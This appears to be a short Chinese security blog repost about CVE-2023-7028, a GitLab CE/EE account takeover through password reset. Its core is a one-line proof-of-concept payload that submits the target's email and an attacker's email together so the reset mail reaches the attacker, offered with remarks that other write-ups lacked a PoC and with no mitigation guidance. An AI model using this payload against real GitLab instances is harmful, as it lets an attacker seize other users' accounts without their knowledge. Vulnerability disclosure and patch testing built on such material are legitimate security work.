GitLab CE/EE 用户密码重置漏洞

admin
admin
admin
102523
文章
87
评论
2024年1月13日16:37:14评论18 views字数 253阅读0分50秒阅读模式

gitlab

条件目标邮箱 poc:

user[email][]=目标邮箱地址&user[email][]=攻击者邮箱地址

ps: 中午朋友发了个某亭的预警,公众号复制赢麻了,已复现的文章里看不到一个poc

CVE-2023-7028

GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028

无需交互,GitLab CE/EE 用户密码重置漏洞

原文始发于微信公众号(小明今天拿站了吗):GitLab CE/EE 用户密码重置漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月13日16:37:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GitLab CE/EE 用户密码重置漏洞http://cn-sec.com/archives/2387825.html

发表评论

匿名网友 填写信息